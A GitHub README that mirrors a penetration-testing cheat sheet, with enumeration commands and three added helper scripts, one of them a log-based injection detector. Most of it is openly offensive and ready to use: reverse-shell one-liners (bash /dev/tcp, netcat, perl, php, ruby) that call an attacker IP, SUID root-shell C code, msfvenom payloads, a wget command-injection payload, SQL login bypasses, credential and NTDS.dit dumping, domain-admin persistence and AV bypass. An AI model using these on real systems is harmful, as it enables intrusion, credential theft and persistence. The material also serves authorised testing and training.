Source: `README-Cheatsheets.md` from the GitHub repository [AnLoMinus/KoTH](https://github.com/AnLoMinus/KoTH) ("KoTH ~ King of the Hill - [BETA]", language: Shell), which mirrors the hausec.com Pentesting Cheatsheet reproduced below.

# [Pentesting Cheatsheet](https://hausec.com/pentesting-cheatsheet/)

In addition to my own contributions, this compilation is made possible by other compiled cheatsheets by [g0tmi1k](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/), [highon.coffee](https://highon.coffee/blog/cheat-sheet/), and [pentestmonkey](http://pentestmonkey.net/), as well as a few others listed at the bottom.
The quickest way to find something is Ctrl+F; the Table of Contents below is only a rough map of the page.

# **Pentesting Cheat Sheet**

## **Table of Contents**

## **Enumeration**
- **General Enumeration**
- **FTP Enumeration (21)**
- **SSH (22)**
- **SMTP Enumeration (25)**
- **Finger Enumeration (79)**
- **Web Enumeration (80/443)**
- **Pop3 (110)**
- **RPCBind (111)**
- **SMB/RPC Enumeration (139/445)**
- **SNMP Enumeration (161)**
- **Oracle (1521)**
- **MySQL Enumeration (3306)**
- **DNS Zone Transfers**
- **Mounting File Shares**
- **Fingerprinting**
- **Exploit Research**
- **Compiling Exploits**
- **Packet Inspection**
- **Password Cracking**
- **Bruteforcing**

## **Shells & Reverse Shells**
- **SUID C Shells**
- **TTY Shell**
- **Fully Interactive TTY**
- **Spawn Ruby Shell**
- **Netcat**
- **Telnet Reverse Shell**
- **PHP**
- **Bash**
- **Perl**

## **Meterpreter**
- **Windows reverse meterpreter payload**
- **Windows VNC Meterpreter payload**
- **Linux Reverse Meterpreter payload**
- **Meterpreter Cheat Sheet**
- **Meterpreter Payloads**
- **Binaries**
- **Web Payloads**
- **Scripting Payloads**
- **Shellcode**
- **Handlers**

## **Powershell**

## **Privilege Escalation**
- **Linux**
- **Windows**

## **Command Injection**
- **File Traverse**
- **Test HTTP options using curl**
- **Upload file using curl to a website with PUT enabled**
- **Transfer file**
- **Activate shell file**

## **SQL Injections**
- **Injections**
- **SQLMap**

## **Miscellaneous**
- **NTLMRelayx.py using mitm6**
- **Name your terminal**
- **Tunneling**
- **AV Bypass**
- **Web hosts**
- **Php Meterpreter Shell**
- **Netcat**
- **Reverse shell using interpreters**
- **Shellshock**
## **CrackMapExec**

## **Resources & Links**
- **Windows Privilege Escalation**
- **SQL & Apache Log paths**
- **Recon**
- **Cheat Sheets (Includes scripts)**
- **Meterpreter Stuff**
- **Proxy Chaining**
- **Huge collection of common commands and scripts as well as general pentest info**
- **Scripts**
- **Pentester Bookmarks, huge collection of blogs, forums, and resources**
- **Pentest Checklist**
- **Pentesting Workflow**
- **OSCP Writeups, blogs, and notes**

---

# **Enumeration**
### **General Enumeration:**

- `nmap -vv -Pn -A -sC -sS -T4 -p- 10.0.0.1`
  - Verbose, SYN scan, all TCP ports, default scripts plus `-A` (OS and version detection, traceroute), no ping. `-sS` needs root.
- `nmap -v -sS -A -T4 x.x.x.x`
  - Verbose, SYN scan, version info and scripts against the default top 1000 ports.
- `nmap --script smb-check-vulns.nse --script-args=unsafe=1 -p445 [host]`
  - Nmap script to scan for vulnerable SMB servers. WARNING: `unsafe=1` may knock the service over. `smb-check-vulns` was split into the individual `smb-vuln-*` scripts in later Nmap releases, so on a current Nmap use `--script smb-vuln-*` instead.
- `netdiscover -r 192.168.1.0/24`
  - ARP sweep of the local subnet.

### **FTP Enumeration (21):**

- `nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.0.0.1`
  - `tft-enum` targets TFTP, which is UDP/69, so it does nothing against TCP/21; run it separately with `-sU -p 69`.

### **SSH (22):**

- `ssh -p 22 user@INSERTIPADDRESS`
- `nc -nv INSERTIPADDRESS 22`
  - Grab the version banner.

### **SMTP Enumeration (25):**

- `nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1`
- `nc -nvv INSERTIPADDRESS 25`
- `telnet INSERTIPADDRESS 25`
  - Then try `VRFY`, `EXPN` or `RCPT TO` by hand to check for user enumeration.

### **Finger Enumeration (79):**

Download the script and run it with a wordlist: [http://pentestmonkey.net/tools/user-enumeration/finger-user-enum](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum)

### **Web Enumeration (80/443):**

- dirbuster (GUI)
- `dirb http://10.0.0.1/`
- `nikto -h 10.0.0.1`

### **Pop3 (110):**

- `telnet INSERTIPADDRESS 110`
- `USER [username]`
- `PASS [password]`
  - To log in
- `LIST`
  - To list messages
- `RETR [message number]`
  - Retrieve message
- `QUIT`
  - Quits
### **RPCBind (111):**

- `rpcinfo -p x.x.x.x`

### **SMB/RPC Enumeration (139/445):**

- `enum4linux -a 10.0.0.1`
- `nbtscan x.x.x.x`
  - Discover Windows / Samba servers on the subnet: finds Windows MAC addresses, NetBIOS names and the client workgroup / domain.
- `ridenum.py 192.168.XXX.XXX 500 50000 dict.txt`
  - RID cycle SMB / enumerate users from SMB over a null session (RIDs 500 to 50000); the wordlist is used to brute-force the accounts it finds.
- `python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX`
  - Packaged as `impacket-samrdump` on current Kali.
- `nmap -p 139,445 IPADDR --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse`
  - `smb-psexec` needs credentials plus a script config, `smb-print-text` sends a print job to a shared printer, and `smb-vuln-regsvc-dos` is a denial-of-service check; drop those unless that is what you intend.
- `smbclient -L //INSERTIPADDRESS/`
  - List open shares (add `-N` for a null session without a password prompt)
- `smbclient //INSERTIPADDRESS/ipc$ -U john`

### **SNMP Enumeration (161):**

- `snmpwalk -c public -v1 10.0.0.0`
- `snmpcheck -t 192.168.1.X -c public`
- `onesixtyone -c names -i hosts`
- `nmap -sU -p 161 192.168.X.X -oG snmp_results.txt`
  - SNMP is UDP, so scan it with `-sU`; a TCP connect scan (`-sT`) of port 161 tells you nothing.
- `snmpenum -t 192.168.1.X`

### **Oracle (1521):**

- `tnscmd10g version -h INSERTIPADDRESS`
- `tnscmd10g status -h INSERTIPADDRESS`

### **MySQL Enumeration (3306):**

- `nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122`

### **DNS Zone Transfers:**

- `nslookup`, then `set type=any`, then `ls -d blah.com`
- `dig axfr blah.com @ns1.blah.com`
  - This one works the best in my experience
- `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml`

### **Mounting File Shares:**

- `showmount -e IPADDR`
  - List NFS exports
- `mount -o nolock 192.168.1.1:/vol/share /mnt/nfs`
  - Mounts the NFS share at /mnt/nfs without locking
- `mount -t cifs -o username=user,password=pass //SERVER/share /mnt/cifs`
  - Mount a Windows CIFS / SMB share on Linux at /mnt/cifs. If you remove `password=` it will prompt on the CLI, which is more secure as the password won't end up in bash_history.
- `net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no`
  - Mount a Windows share on Windows from the command line
- `apt-get install smb4k -y`
  - Install smb4k on Kali, a useful Linux GUI for browsing SMB shares
### **Fingerprinting: basic versioning / fingerprinting via the displayed banner**

- `nc -v 192.168.1.1 25`
- `telnet 192.168.1.1 25`

### **Exploit Research**

- `searchsploit windows 2003 | grep -i local`
  - Search exploit-db for an exploit; in this example, Windows 2003 + local escalation

### **Compiling Exploits**

- `gcc -o exploit exploit.c`
  - Compile C code; add `-m32` after `gcc` to compile 32-bit code on 64-bit Linux (needs the 32-bit libc headers, e.g. `gcc-multilib`)
- `i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe`
  - Compile a Windows .exe on Linux. Current distributions ship the cross-compiler as `i686-w64-mingw32-gcc` (32-bit) / `x86_64-w64-mingw32-gcc` (64-bit).

### **Packet Inspection:**

- `tcpdump -i eth0 -w output.pcap tcp port 80`
  - Capture port 80 traffic on interface eth0 to output.pcap. The capture filter has to come after the options; `tcpdump tcp port 80 -w output.pcap` is rejected as a filter syntax error.

# **Password Cracking**

- `hash-identifier [hash]`
- `john hashes.txt`
- `hashcat -m 500 -a 0 -o output.txt --remove hashes.txt /usr/share/wordlists/rockyou.txt`
  - Wordlist attack on md5crypt (`$1$`) hashes; cracked hashes go to output.txt and are removed from hashes.txt
- `hashcat -m 1000 dump.txt -o output.txt --remove -a 3 ?u?l?l?d?d?d?d`
  - Mask attack on NTLM hashes: one uppercase letter, two lowercase letters and four digits
- List of hash types and examples for hashcat: [https://hashcat.net/wiki/doku.php?id=example_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes)
- [https://hashkiller.co.uk](https://hashkiller.co.uk) has a good repo of already cracked MD5 and NTLM hashes

### **Bruteforcing:**

- `hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin`
  - The string after the last colon (`invalid`) is the failure marker hydra looks for in the response; pick something that only appears on a failed login, or hydra will report every guess as a hit.
- `hydra -l admin -P /usr/share/wordlists/rockyou.txt -o results.txt IPADDR PROTOCOL`
- `hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V`
  - Hydra SMTP brute force
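The nmap scans in the Enumeration section above are easiest to chain when the first all-ports scan writes grepable output (`-oG`) and a second scan runs `-sC -sV` only against what turned out to be open. The script below is an added example, not part of the original cheat sheet: it parses `-oG` output into open ports per host and uses that to build the second-stage scan. The scan output embedded in it is constructed, and `two_stage_scan` assumes an IP-address target (so it matches the `Host:` field) and root for `-sS`.

```shell
#!/bin/sh
# Added example: triage nmap grepable (-oG) output and drive a two-stage scan.
# The sample output below is constructed, not a real scan.

SAMPLE_GREPABLE="$(printf '%b' '# Nmap 7.94 scan initiated (constructed sample)\nHost: 10.0.0.1 ()\tStatus: Up\nHost: 10.0.0.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (65532)\nHost: 10.0.0.2 ()\tPorts: 3306/open/tcp//mysql///, 161/open|filtered/udp//snmp///\tIgnored State: closed (65533)\n# Nmap done (constructed sample)')"

# Print "host port proto service" for every port whose state is exactly "open".
# Fields in -oG are tab-separated; each port entry is port/state/proto/owner/service/...
open_ports() {
  awk -F'\t' '
    /^Host:/ {
      host = $1; sub(/^Host: /, "", host); sub(/ .*/, "", host)
      for (i = 2; i <= NF; i++) if ($i ~ /^Ports: /) {
        list = $i; sub(/^Ports: /, "", list)
        n = split(list, entry, /, /)
        for (j = 1; j <= n; j++) {
          split(entry[j], f, "/")
          if (f[2] == "open") print host, f[1], f[3], f[5]
        }
      }
    }'
}

# Comma-separated open TCP ports for one host, in the form nmap -p expects (empty if none).
port_list() {  # usage: port_list HOST < grepable-output
  open_ports | awk -v h="$1" '$1 == h && $3 == "tcp" { printf "%s%s", sep, $2; sep = "," } END { print "" }'
}

# Stage 1: all TCP ports, SYN scan, grepable output to stdout.
# Stage 2: default scripts and version detection against only the open ports.
# Assumes TARGET is an IP address and that you are root. Not run here: needs a live target.
two_stage_scan() {  # usage: two_stage_scan TARGET
  target="$1"
  ports="$(nmap -Pn -sS -T4 -p- -oG - "$target" | port_list "$target")"
  if [ -z "$ports" ]; then
    echo "no open TCP ports found on $target" >&2
    return 1
  fi
  nmap -Pn -sC -sV -p "$ports" "$target"
}

# Demonstration on the constructed sample:
printf '%s\n' "$SAMPLE_GREPABLE" | open_ports
printf '%s\n' "$SAMPLE_GREPABLE" | port_list 10.0.0.1
```

Only ports whose state is exactly `open` are kept, so UDP `open|filtered` results (like the SNMP entry in the sample) are deliberately left out of the second stage; rescan those with `-sU` and a service probe.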
## **Shells & Reverse Shells**

### **SUID C Shells**

Compile, then (as root) `chown root:root` and `chmod 4755` the binary; any user who runs it gets a root shell. `setresuid(0, 0, 0)` sets the real uid as well as the effective uid, which matters because bash drops privileges when the two differ.

- bin/bash:

```c
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    setresuid(0, 0, 0);   /* real, effective and saved uid all 0 */
    system("/bin/bash");
}
```

- bin/sh:

```c
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void) {
    setresuid(0, 0, 0);
    system("/bin/sh");
}
```

### **TTY Shell:**

- `python -c 'import pty;pty.spawn("/bin/bash")'`
- `import os; os.system('/bin/bash')`
  - From a Python prompt
- `/bin/sh -i`
- `os.execute('/bin/sh')`
  - Lua
- `!sh`
  - Shell escape from an old `nmap --interactive` (removed in later versions)
- `:!bash`
  - Shell escape from vi

### Fully Interactive TTY

- In the reverse shell: `python -c 'import pty; pty.spawn("/bin/bash")'`, then press Ctrl-Z to background it
- In the attacker console: `stty -a` (note the rows and columns values), then `stty raw -echo; fg`
- Back in the reverse shell: `reset`, `export SHELL=bash`, `export TERM=xterm-256color`, `stty rows <num> columns <cols>`

### **Spawn Ruby Shell**

- `exec "/bin/sh"`
- `ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'`

### **Netcat**

- `nc -e /bin/sh ATTACKING-IP 80`
  - Needs a netcat built with `-e` support; the next two work without it
- `/bin/sh | nc ATTACKING-IP 80`
- `rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0</tmp/p | /bin/sh 1>/tmp/p`
  - Named-pipe relay: the shell reads commands from the socket and writes its output back through the FIFO

### **Telnet Reverse Shell**

- `rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/bash 1>/tmp/p`
- `telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443`
  - Commands are typed on the first listener (port 80); output comes back on the second (port 443)

### **PHP**

- `php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'`
  - Assumes the TCP socket is file descriptor 3. If it doesn't work, try 4, 5 or 6.
### **Bash**

- `exec /bin/bash 0<&0 2>&0`
  - Re-executes bash on the descriptors you already hold; useful once a socket is attached to stdin
- `0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196`
- `exec 5<>/dev/tcp/ATTACKING-IP/80; cat <&5 | while read line; do $line 2>&5 >&5; done`
  - or: `while read line 0<&5; do $line 2>&5 >&5; done`
  - `/dev/tcp` is a bash feature; these do not work under `sh`/dash
- `bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1`

### **Perl**

- `exec "/bin/sh";`
- `perl -e 'exec "/bin/sh";'`
- `perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`
- `perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'`
  - Windows (does not need `/bin/sh`; each line received is run with `system`)

# **Meterpreter**

### **Windows reverse meterpreter payload**

- `set payload windows/meterpreter/reverse_tcp`
  - Windows reverse TCP payload

### **Windows VNC Meterpreter payload**

- `set payload windows/vncinject/reverse_tcp`
  - Meterpreter Windows VNC payload
- `set ViewOnly false`

### **Linux Reverse Meterpreter payload**

- `set payload linux/meterpreter/reverse_tcp`
  - Meterpreter Linux reverse payload

### **Meterpreter Cheat Sheet**

- `upload file c:\\windows`
  - Meterpreter upload file to Windows target
- `download c:\\windows\\repair\\sam /tmp`
  - Meterpreter download file from Windows target (grab `c:\\windows\\repair\\system` too; the SAM hashes can't be decrypted without the boot key from the SYSTEM hive)
- `execute -f c:\\windows\\temp\\exploit.exe`
  - Meterpreter run .exe on target; handy for executing uploaded exploits
- `execute -f cmd -c`
  - Creates a new channel with a cmd shell
- `ps`
  - Meterpreter show processes
- `shell`
  - Meterpreter get shell on the target
- `getsystem`
  - Meterpreter attempts privilege escalation on the target
- `hashdump`
  - Meterpreter attempts to dump the hashes on the target (must have SYSTEM privileges; try migrating to a SYSTEM process such as winlogon.exe first if possible)
- `portfwd add -l 3389 -p 3389 -r target`
  - Meterpreter create port forward to target machine
- `portfwd delete -l 3389 -p 3389 -r target`
  - Meterpreter delete port forward
- `use exploit/windows/local/bypassuac`
  - Bypass UAC on Windows 7+; set target and arch (x86/x64)
- `use auxiliary/scanner/http/dir_scanner`
  - Metasploit HTTP directory scanner
- `use auxiliary/scanner/http/jboss_vulnscan`
  - Metasploit JBoss vulnerability scanner
- `use auxiliary/scanner/mssql/mssql_login`
  - Metasploit MSSQL credential scanner
- `use auxiliary/scanner/mysql/mysql_version`
  - Metasploit MySQL version scanner
- `use auxiliary/scanner/oracle/oracle_login`
  - Metasploit Oracle login module
- `use exploit/multi/script/web_delivery`
  - Metasploit PowerShell payload delivery module
- `use post/windows/manage/powershell/exec_powershell`
  - Metasploit upload and run a PowerShell script through a session
- `use exploit/multi/http/jboss_maindeployer`
  - Metasploit JBoss deploy
- `use exploit/windows/mssql/mssql_payload`
  - Metasploit MSSQL payload
- `run post/windows/gather/win_privs`
  - Metasploit show privileges of current user
- `use post/windows/gather/credentials/gpp`
  - Metasploit grab GPP saved passwords
- `load kiwi`
- `creds_all`
  - Metasploit load Mimikatz/kiwi and get creds
- `run post/windows/gather/local_admin_search_enum`
  - Identify other machines that the supplied domain user has administrative access to
- `set AUTORUNSCRIPT post/windows/manage/migrate`
  - Migrate automatically as soon as a session opens

### **Meterpreter Payloads**

- `msfvenom -l`
  - List payloads, encoders, formats and other options

### **Binaries**

- `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf`
- `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe`
- `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho`

### **Web Payloads**

- `msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php`
  - PHP
- `set payload php/meterpreter/reverse_tcp`
  - Listener
- `cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php`
  - PHP: prepend the `<?php` tag that `-f raw` leaves out (`pbcopy`/`pbpaste` are the macOS clipboard tools)
- `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp`
  - ASP
- `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp`
  - JSP
- `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war`
  - WAR

### **Scripting Payloads**

- `msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py`
  - Python
- `msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh`
  - Bash
- `msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl`
  - Perl

### **Shellcode**

For all shellcode see `msfvenom --help-formats` (`msfvenom --list formats` on current versions) for the valid output formats. msfvenom will output the shellcode in the chosen language's array syntax (for example `-f c` or `-f python`), ready to paste into your exploit.
- `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f <format>`
- `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f <format>`
- `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f <format>`

### **Handlers**

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers use the following module:

    exploit/multi/handler

The payload you generate with msfvenom and the payload set on the handler must match. An example is:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe
    msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST <ip>; set LPORT <port>; run"

# **Powershell**

**Execution Bypass**

- `Set-ExecutionPolicy Unrestricted`, then `./file.ps1`
- `Import-Module script.psm1`, then `Invoke-FunctionThatIsInTheModule`
- `iex(new-object system.net.webclient).downloadstring("file:///C:\examplefile.ps1")`
  - Execution policy is not a security boundary; `powershell -ExecutionPolicy Bypass` works as well.

**Powershell.exe blocked**

- Use 'not powershell' [https://github.com/Ben0xA/nps](https://github.com/Ben0xA/nps)

**Persistence**

- `net user username "password" /ADD`
- `net group "Domain Admins" %username% /DOMAIN /ADD`
  - Both are noisy: account creation and group membership changes are logged by default.

**Gather NTDS.dit file**

- `ntdsutil`
- `activate instance ntds`
- `ifm`
- `create full C:\ntdsutil`
- `quit`
- `quit`
  - Run on a domain controller with Domain Admin rights; the IFM dump contains NTDS.dit plus the SYSTEM hive needed to decrypt it.

# **Privilege Escalation**

## **Linux:**

Find binaries that will execute as the owner (setuid)

- `find / -perm -u=s -type f 2>/dev/null`

Find binaries that will execute as the group (setgid)

- `find / -perm -g=s -type f 2>/dev/null`

Find sticky-bit directories (world-writable directories such as /tmp normally have it)

- `find / -perm -1000 -type d 2>/dev/null`

If Python is executable as root

- `python2.7 -c "import pty;pty.spawn('/bin/sh');"`

[https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)

[https://github.com/pentestmonkey/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
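Running the `find` commands above over `/` on a target is slow and the raw output is easy to misread, so here is an added example (not from the original cheat sheet) that wraps the setuid/setgid search in one function, prints mode and owner next to each path, and checks itself against a scratch directory before you trust it on a real box. It assumes GNU `find` (for `-printf`) and `mktemp -d`; the scratch files it creates are constructed, not real binaries.

```shell
#!/bin/sh
# Added example: setuid/setgid hunt with a built-in sanity check (GNU find assumed).

# List regular files under $1 with the setuid (4000) or setgid (2000) bit set,
# one per line as "MODE OWNER PATH", staying on one filesystem (-xdev).
find_setid() {
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -printf '%m %u %p\n' 2>/dev/null | sort
}

# Same search restricted to root-owned setuid files: the ones that matter for escalation.
find_root_setuid() {
  find "$1" -xdev -type f -user root -perm -4000 -printf '%m %u %p\n' 2>/dev/null | sort
}

# Sanity check in a scratch directory (constructed files, not real binaries):
# one plain file, one setuid, one setgid. Prints the hits with the scratch path stripped.
selfcheck_setid() {
  d="$(mktemp -d)" || return 1
  : > "$d/plain"; chmod 0755 "$d/plain"
  : > "$d/suid";  chmod 4755 "$d/suid"
  : > "$d/sgid";  chmod 2755 "$d/sgid"
  find_setid "$d" | sed "s#$d/##"
  rm -rf "$d"
}

# Demonstration: expect the suid and sgid files, and not the plain one.
selfcheck_setid
# On a target you would then run, for example:  find_root_setuid /
# and diff the list against a stock install of the same distribution.
```

Anything in the root-owned list that is not part of the base distribution (a custom binary in /opt, an old copy of a known-vulnerable tool) is where to spend time; the GTFOBins-style escapes for stock binaries are the other half of that check.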
## **Windows:**

[https://github.com/pentestmonkey/windows-privesc-check](https://github.com/pentestmonkey/windows-privesc-check)

[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)

[https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/](https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/)

# **Command Injection**

### **File Traverse:**

- `website.com/file.php?path=/`
  - Once `path` is passed to a shell command, append `;` or `|` and your own command to it.

### **Test HTTP options using curl:**

- `curl -vX OPTIONS [website]`

### **Upload file using curl to a website with PUT enabled**

- `curl --upload-file shell.php --url http://192.168.218.139/test/shell.php --http1.0`

### **Transfer file** (try the temp directory if the web root isn't writable; `wget -O` tells it where to store the file):

- `?path=/; wget http://IPADDRESS:8000/FILENAME.EXTENSION;`

### **Activate shell file:**

- `; php -f filelocation.php;`
  - URL-encode the payload when it goes in a query string (`;` becomes `%3B`, a space `%20`).

# **SQL Injections**

### Common **Injections for Login Forms:**

- `admin' --`
- `admin' #`
- `admin'/*`
- `' or 1=1--`
- `' or 1=1#`
- `' or 1=1/*`
- `') or '1'='1--`
- `') or ('1'='1--`
  - `--` needs a trailing space in MySQL (`-- `), `#` is MySQL-only, and `/*` only works where the rest of the query can be swallowed by the comment.

### **SQLMap**

- `sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`
  - Automated sqlmap scan
- `sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3`
- `sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"`
  - Targeted sqlmap scan
- `sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump`
  - Scan the URL for UNION-based injection with a MySQL backend, use a random user agent, and dump the database
- `sqlmap -o -u "http://meh.com/form/" --forms`
  - sqlmap check form for injection
- `sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump`
  - sqlmap dump (and offer to crack) hashes for table users on database-name
- `sqlmap --flush-session`
  - Flushes the session
- `sqlmap -p user --technique=B`
  - Attempts to exploit the "user" field using the boolean-based technique
- `sqlmap -r <captured request>`
  - Capture a request via Burp Suite, save it to a file, and use this command to let sqlmap automate everything. Add `--os-shell` at the end to pop a shell if possible.
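The login-bypass strings and the `; wget ...` command-injection payload above are also exactly what you look for on the defensive side. The script below is an added example, not part of the original cheat sheet: it greps a web-server access log for those two payload families in both raw and URL-encoded form and ranks the source addresses. The log lines are constructed, and the patterns are deliberately narrow to keep false positives low, so treat them as a starting point rather than a complete signature set.

```shell
#!/bin/sh
# Added example: spot SQL-injection login bypass and command-injection attempts in an
# access log. The sample log is constructed; the regexes cover raw and %XX-encoded forms.

SAMPLE_ACCESS_LOG='10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "POST /login.php?user=admin%27%20--&pass=x HTTP/1.1" 302 0
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /file.php?path=/%3B%20wget%20http://10.0.0.9:8000/shell.php%3B HTTP/1.1" 200 88
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /file.php?id=1%27%20or%201%3D1-- HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /about.html HTTP/1.1" 200 1024'

# A quote (raw or %27), optional encoded spaces, then a comment opener or an OR clause.
SQLI_RE="('|%27)(%20|\+)*(or(%20|\+|'|%27)|--|#|%23|/\*|%2f%2a)"
# A shell separator (; | && raw or encoded), optional encoded spaces, then a downloader or
# interpreter name that is not merely the prefix of a longer word.
CMDI_RE="(;|%3b|[|]|%7c|&&|%26%26)(%20|\+)*(wget|curl|nc|bash|sh|php|python|perl)([^a-z0-9_]|\$)"

# Read log lines on stdin and print each hit prefixed with its class ("sqli: " or "cmdi: ").
flag_injection() {
  data="$(cat)"
  printf '%s\n' "$data" | grep -Ei "$SQLI_RE" | sed 's/^/sqli: /'
  printf '%s\n' "$data" | grep -Ei "$CMDI_RE" | sed 's/^/cmdi: /'
  return 0
}

# Source addresses with at least one hit, most hits first: the hosts to pull into the investigation.
top_sources() {
  flag_injection | awk '{ print $2 }' | sort | uniq -c | sort -rn
}

# Demonstration on the constructed log:
printf '%s\n' "$SAMPLE_ACCESS_LOG" | flag_injection
printf '%s\n' "$SAMPLE_ACCESS_LOG" | top_sources
```

Feed it a real log with `flag_injection < /var/log/apache2/access.log`. Note that POST bodies never appear in the access log, so a login form attacked through the body (as the `hydra http-post-form` line earlier on this page does) only shows up here if the application logs the parameters itself.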
# **Miscellaneous**

#### NTLMRelayx.py using mitm6

This takes credentials captured via IPv6 spoofing with mitm6 and relays them to a target via ntlmrelayx.py. It requires ntlmrelayx.py and mitm6 to be installed already.

- `mitm6 -d <domain.local>`
  - First, start mitm6 and specify the domain you're spoofing on with `-d domain.name`
- `ntlmrelayx.py -6 -wh 192.168.1.1 -t smb://192.168.1.2 -l ~/tmp/`
  - `-6` listens on IPv6, `-wh` specifies where the WPAD file is hosted (your IP, usually), `-t` specifies the target where the credentials will be relayed, and `-l` is where to store the loot. Relaying to SMB only works when the target does not require SMB signing.

#### Name your terminal whatever you want

This small script will name your terminal whatever you pass as an argument to it. It helps with organizing when you have multiple terminals open. Thanks Ben!

```bash
#!/bin/bash
# Set the terminal window title to the first argument (xterm OSC 0 escape sequence)
echo -ne "\033]0;${1}\007"
```

**Tunneling:**

sshuttle is an awesome tunneling tool that does all the hard work for you. It gets rid of the need for proxychains. This command tunnels traffic through 10.0.0.1 and routes all traffic destined for 10.10.10.0/24 through the sshuttle tunnel.

- `sshuttle -r root@10.0.0.1 10.10.10.0/24`

**AV Bypass:**

- `wine hyperion.exe ../backdoor.exe ../backdoor_mutation.exe`
  - wine and hyperion need to be installed.

**Web hosts**

- `python -m SimpleHTTPServer 80`
  - Basic HTTP server (Python 2) that lists the directory it's started in; on Python 3 use `python3 -m http.server 80`.
- `service apache2 start`
  - Starts the Apache web server. Place files in /var/www/html to be able to `wget` them.
### **Php Meterpreter Shell (Remove Guard bit)**

